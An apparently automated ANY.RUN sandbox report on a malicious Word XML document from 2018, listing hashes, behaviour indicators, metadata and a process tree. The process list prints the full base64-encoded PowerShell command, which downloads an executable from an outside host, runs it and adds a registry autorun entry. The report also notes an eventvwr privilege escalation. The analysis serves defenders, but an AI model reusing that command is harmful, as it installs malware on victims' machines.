File name:

23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c

Full analysis: https://app.any.run/tasks/d47ed706-3122-40d3-917d-78c117afd068
Verdict: Malicious activity
Analysis date: November 08, 2018, 06:34:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

D6A5B472987763190497C24D0DFD74E8

SHA1:

A2228CEA5A43695656F6B5D531D56CB4C963030E

SHA256:

23FA88BBAB4EC6EC9125733D367295ACE6E828CA670A88E979FCDDFF1D63A77C

SSDEEP:

6144:N/lA5ANOZbg144HsiI1wFwo2ywm7THlYx15Gw4rqYetVp:N/lA5ANORKHsiI1w5dnFcgbrqYetVp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2504)
    • Executes PowerShell scripts

      • cmD.exe (PID: 2748)
    • Application was dropped or rewritten from another process

      • OTCkeomF.exe (PID: 584)
      • OTCkeomF.exe (PID: 944)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2504)
    • Changes the autorun value in the registry

      • powershell.exe (PID: 3780)
    • Known privilege escalation attack

      • OTCkeomF.exe (PID: 584)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3204)
    • Creates files in the user directory

      • powershell.exe (PID: 3780)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3780)
    • Modifies the open verb of a shell class

      • OTCkeomF.exe (PID: 584)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2504)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2504)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (42.2)
.rels | Open Office XML Relationships (27.2)
.xml | Microsoft Office XML Flat File Format (ASCII) (20.1)
.svg | Scalable Vector Graphics (var.3) (4.3)
.opml/xml | Outline Processor Markup Language (3.4)

EXIF

XMP

PackagePartName: /_rels/.rels
PackagePartContentType: application/vnd.openxmlformats-package.relationships+xml
PackagePartPadding: 512
PackagePartXmlDataRelationshipsXmlns: http://schemas.openxmlformats.org/package/2006/relationships
PackagePartXmlDataRelationshipsRelationshipId: rId3
PackagePartXmlDataRelationshipsRelationshipType: http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipTarget: docProps/app.xml
PackagePartXmlDataDocumentIgnorable: w14 w15 w16se w16cid wp14
PackagePartXmlDataDocumentBodyPRsidR: 00184900
PackagePartXmlDataDocumentBodyPRsidRDefault: 00184900
PackagePartXmlDataDocumentBodyPBookmarkStartId: -
PackagePartXmlDataDocumentBodyPBookmarkStartName: _GoBack
PackagePartXmlDataDocumentBodyPBookmarkEndId: -
PackagePartXmlDataDocumentBodyPRRPrNoProof: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx: 5943600
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy: 4093845
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB: 1905
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName: Picture 1
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri: http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed: rId5
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri: {28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx: 5943600
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy: 4093845
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst: rect
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst: -
PackagePartXmlDataDocumentBodySectPrRsidR: 00184900
PackagePartXmlDataDocumentBodySectPrPgSzW: 12240
PackagePartXmlDataDocumentBodySectPrPgSzH: 15840
PackagePartXmlDataDocumentBodySectPrPgMarTop: 1440
PackagePartXmlDataDocumentBodySectPrPgMarRight: 1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom: 1440
PackagePartXmlDataDocumentBodySectPrPgMarLeft: 1440
PackagePartXmlDataDocumentBodySectPrPgMarHeader: 720
PackagePartXmlDataDocumentBodySectPrPgMarFooter: 720
PackagePartXmlDataDocumentBodySectPrPgMarGutter: -
PackagePartXmlDataDocumentBodySectPrColsSpace: 720
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: 360
PackagePartBinaryData: (Binary data 75668 bytes, use -b option to extract)
PackagePartCompression: store
PackagePartXmlDataThemeName: Office Theme
PackagePartXmlDataThemeThemeElementsClrSchemeName: Office
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: windowText
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: 000000
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: window
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: 44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: 4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: 5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: 70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: 0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: 954F72
PackagePartXmlDataThemeThemeElementsFontSchemeName: Office
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: 020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: 游ゴシック Light
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: 020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: 游明朝
PackagePartXmlDataThemeThemeElementsFmtSchemeName: Office
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: 67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 100000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: 6350
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: 800000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: 57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: 19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: 000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: 63000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: 95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: 170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: 93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeObjectDefaults: -
PackagePartXmlDataThemeExtraClrSchemeLst: -
PackagePartXmlDataThemeExtLstExtUri: {05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtLstExtThemeFamilyName: Office Theme
PackagePartXmlDataThemeExtLstExtThemeFamilyId: {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyVid: {4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataVbaSuppDataIgnorable: w14 w15 w16se w16cid wp14
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: -
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: PROJECT.C_N1XNTEHWRD.G_ZNFYBNIXNZWXMEK8KG
PackagePartXmlDataVbaSuppDataMcdsMcdName: Project.c_n1xntEhWrd.G_znFYBNiXnZwXMek8kG
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: 00
PackagePartXmlDataVbaSuppDataMcdsMcdCmg: 56
PackagePartXmlDataSettingsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataSettingsZoomPercent: 100
PackagePartXmlDataSettingsDefaultTabStopVal: 720
PackagePartXmlDataSettingsCharacterSpacingControlVal: doNotCompress
PackagePartXmlDataSettingsCompatCompatSettingName: compatibilityMode
PackagePartXmlDataSettingsCompatCompatSettingUri: http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingVal: 15
PackagePartXmlDataSettingsRsidsRsidRootVal: 00184900
PackagePartXmlDataSettingsRsidsRsidVal: 00184900
PackagePartXmlDataSettingsMathPrMathFontVal: Cambria Math
PackagePartXmlDataSettingsMathPrBrkBinVal: before
PackagePartXmlDataSettingsMathPrBrkBinSubVal: --
PackagePartXmlDataSettingsMathPrSmallFracVal: -
PackagePartXmlDataSettingsMathPrDispDef: -
PackagePartXmlDataSettingsMathPrLMarginVal: -
PackagePartXmlDataSettingsMathPrRMarginVal: -
PackagePartXmlDataSettingsMathPrDefJcVal: centerGroup
PackagePartXmlDataSettingsMathPrWrapIndentVal: 1440
PackagePartXmlDataSettingsMathPrIntLimVal: subSup
PackagePartXmlDataSettingsMathPrNaryLimVal: undOvr
PackagePartXmlDataSettingsThemeFontLangVal: en-US
PackagePartXmlDataSettingsClrSchemeMappingBg1: light1
PackagePartXmlDataSettingsClrSchemeMappingT1: dark1
PackagePartXmlDataSettingsClrSchemeMappingBg2: light2
PackagePartXmlDataSettingsClrSchemeMappingT2: dark2
PackagePartXmlDataSettingsClrSchemeMappingAccent1: accent1
PackagePartXmlDataSettingsClrSchemeMappingAccent2: accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent3: accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent4: accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent5: accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent6: accent6
PackagePartXmlDataSettingsClrSchemeMappingHyperlink: hyperlink
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: followedHyperlink
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: 1026
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: 1
PackagePartXmlDataSettingsDecimalSymbolVal: .
PackagePartXmlDataSettingsListSeparatorVal: ,
PackagePartXmlDataSettingsChartTrackingRefBased: -
PackagePartXmlDataSettingsDocIdVal: {D3F60254-1C5C-4604-83DB-73C38CBCD213}
PackagePartXmlDataPropertiesXmlns: http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataPropertiesTemplate: Normal.dotm
PackagePartXmlDataPropertiesTotalTime: -
PackagePartXmlDataPropertiesPages: 1
PackagePartXmlDataPropertiesWords: -
PackagePartXmlDataPropertiesCharacters: 1
PackagePartXmlDataPropertiesApplication: Microsoft Office Word
PackagePartXmlDataPropertiesDocSecurity: -
PackagePartXmlDataPropertiesLines: 1
PackagePartXmlDataPropertiesParagraphs: 1
PackagePartXmlDataPropertiesScaleCrop: -
PackagePartXmlDataPropertiesCompany: -
PackagePartXmlDataPropertiesLinksUpToDate: -
PackagePartXmlDataPropertiesCharactersWithSpaces: 1
PackagePartXmlDataPropertiesSharedDoc: -
PackagePartXmlDataPropertiesHyperlinksChanged: -
PackagePartXmlDataPropertiesAppVersion: 16
PackagePartXmlDataStylesIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: ar-SA
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: 160
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: 259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: auto
PackagePartXmlDataStylesLatentStylesDefLockedState: -
PackagePartXmlDataStylesLatentStylesDefUIPriority: 99
PackagePartXmlDataStylesLatentStylesDefSemiHidden: -
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: -
PackagePartXmlDataStylesLatentStylesDefQFormat: -
PackagePartXmlDataStylesLatentStylesCount: 375
PackagePartXmlDataStylesLatentStylesLsdExceptionName: Normal
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: -
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: 1
PackagePartXmlDataStylesStyleType: paragraph
PackagePartXmlDataStylesStyleDefault: 1
PackagePartXmlDataStylesStyleStyleId: Normal
PackagePartXmlDataStylesStyleNameVal: Normal
PackagePartXmlDataStylesStyleQFormat: -
PackagePartXmlDataStylesStyleUiPriorityVal: 1
PackagePartXmlDataStylesStyleSemiHidden: -
PackagePartXmlDataStylesStyleUnhideWhenUsed: -
PackagePartXmlDataStylesStyleTblPrTblIndW: -
PackagePartXmlDataStylesStyleTblPrTblIndType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: dxa
PackagePartXmlDataCorePropertiesTitle: -
PackagePartXmlDataCorePropertiesSubject: -
PackagePartXmlDataCorePropertiesCreator: Dimitri czar
PackagePartXmlDataCorePropertiesKeywords: -
PackagePartXmlDataCorePropertiesDescription: -
PackagePartXmlDataCorePropertiesLastModifiedBy: Dimitri czar
PackagePartXmlDataCorePropertiesRevision: 1
PackagePartXmlDataCorePropertiesCreatedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated: 2018:11:07 12:17:00Z
PackagePartXmlDataCorePropertiesModifiedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesModified: 2018:11:07 12:17:00Z
PackagePartXmlDataFontsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataFontsFontName: Calibri
PackagePartXmlDataFontsFontPanose1Val: 020F0502020204030204
PackagePartXmlDataFontsFontCharsetVal: 00
PackagePartXmlDataFontsFontFamilyVal: swiss
PackagePartXmlDataFontsFontPitchVal: variable
PackagePartXmlDataFontsFontSigUsb0: E0002AFF
PackagePartXmlDataFontsFontSigUsb1: C000247B
PackagePartXmlDataFontsFontSigUsb2: 00000009
PackagePartXmlDataFontsFontSigUsb3: 00000000
PackagePartXmlDataFontsFontSigCsb0: 000001FF
PackagePartXmlDataFontsFontSigCsb1: 00000000
PackagePartXmlDataWebSettingsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataWebSettingsOptimizeForBrowser: -
PackagePartXmlDataWebSettingsAllowPNG: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start msoxmled.exe no specs winword.exe no specs cmd.exe no specs powershell.exe otckeomf.exe no specs eventvwr.exe no specs eventvwr.exe otckeomf.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
584"C:\Users\admin\OTCkeomF.exe" C:\Users\admin\OTCkeomF.exepowershell.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Exit code:
0
Version:
0.0.0.0
Modules
Images
c:\users\admin\otckeomf.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
944"C:\Users\admin\OTCkeomF.exe" C:\Users\admin\OTCkeomF.exeeventvwr.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
HIGH
Description:
Skype
Exit code:
0
Version:
0.0.0.0
Modules
Images
c:\users\admin\otckeomf.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
1960"C:\Windows\System32\eventvwr.exe" C:\Windows\System32\eventvwr.exe
OTCkeomF.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Event Viewer Snapin Launcher
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\eventvwr.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
2020"C:\Windows\System32\eventvwr.exe" C:\Windows\System32\eventvwr.exeOTCkeomF.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Event Viewer Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\eventvwr.exe
c:\systemroot\system32\ntdll.dll
2504"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2748cmD /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBxADUAQwB1AFMAdgBmAHYAegB4AF8AawBLAE0ASAA4AEwAQQA1AGcAYgBOAHYAIAAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQA7AHMAdABhAHIAdAAgACQAdwBVAG8AVwBpAG4ARwB4AGIAZwBhAGsASwBnAG0AYQBIAHQAbAAgADsAIAANAAoAfQANAAoAdAByAHkAewANAAoADQAKACQAUwBVAGIARwBrAF8ANAAyAEMAOQA4AE0AQQBlAGsAVwBHAHoAbQBIADkAagA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwATwBUAEMAawBlAG8AbQBGAC4AZQB4AGUAJwA7AA0ACgBFAHEANQBDAHUAUwB2AGYAdgB6AHgAXwBrAEsATQBIADgATABBADUAZwBiAE4AdgAgACcAaAB0AHQAcABzADoALwAvAGUALgBjAG8AawBhAC4AbABhAC8AVQBJAEkAQwBiADYALgBqAHAAZwAnACAAJABTAFUAYgBHAGsAXwA0ADIAQwA5ADgATQBBAGUAawBXAEcAegBtAEgAOQBqADsADQAKACQARABWAFgAZQBlAEUANwBqAG0AaQBwAFQANwBYAFAAVQBPAHAAUAB1AEIANQBDAG4AdwBDAFEAVAAgAD0AJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQArACcAXABPAFQAQwBrAGUAbwBtAEYALgBlAHgAZQAnADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACcAMQAwADEAMAAxADAAMQAnACAALQBWAGEAbAB1AGUAIAAkAEQAVgBYAGUAZQBFADcAagBtAGkAcABUADcAWABQAFUATwBwAFAAdQBCADUAQwBuAHcAQwBRAFQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAJwBTAHQAcgBpAG4AZwAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0AC:\Windows\system32\cmD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3204"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
Modules
Images
c:\program files\common files\microsoft shared\office14\msoxmled.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
